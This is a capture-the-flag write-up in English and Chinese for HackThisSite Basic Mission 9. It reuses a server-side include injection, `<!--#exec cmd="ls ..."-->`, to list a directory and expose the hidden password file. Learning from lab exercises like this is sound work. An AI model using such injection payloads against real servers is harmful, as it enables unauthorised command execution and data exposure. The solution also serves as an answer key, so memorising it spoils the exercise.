HackThisSite - Basic Mission 9
Challenge
Network Security Sam is going down with the ship - he's determined to keep obscuring the password file, no matter how many times people manage to recover it. This time the file is saved in /var/www/hackthissite.org/html/missions/basic/9/.
In the last level, however, in my attempt to limit people to using server side includes to display the directory listing to level 8 only, I have mistakenly screwed up somewhere.. there is a way to get the obscured level 9 password.
Sam 坚持继续藏密码文件。这次藏在 /missions/basic/9/ 目录。 但他承认上一关的限制搞砸了——仍然有办法获取 level 9 的密码。
注意:这一关页面没有输入框(除了密码框),没有可直接注入的地方。
Solution
题目暗示上一关的 SSI 漏洞仍然可以利用来访问 level 9 的密码。
回到 Basic 8 的 level8.php,再次使用 SSI
注入,但这次将路径指向 level 9 的目录:
1 | <!--#exec cmd="ls ../9/" --> |
提交后访问生成的 .shtml 文件,输出显示 level 9
目录内容:
1 | index.php |
访问
https://www.hackthissite.org/missions/basic/9/p91e283zc3.php
获取密码。
核心知识点: 1. 修复一个漏洞时要确保修复彻底——不能只限制某个特定范围就以为安全了 2. 路径遍历(directory traversal)可以突破相对路径限制
1883004c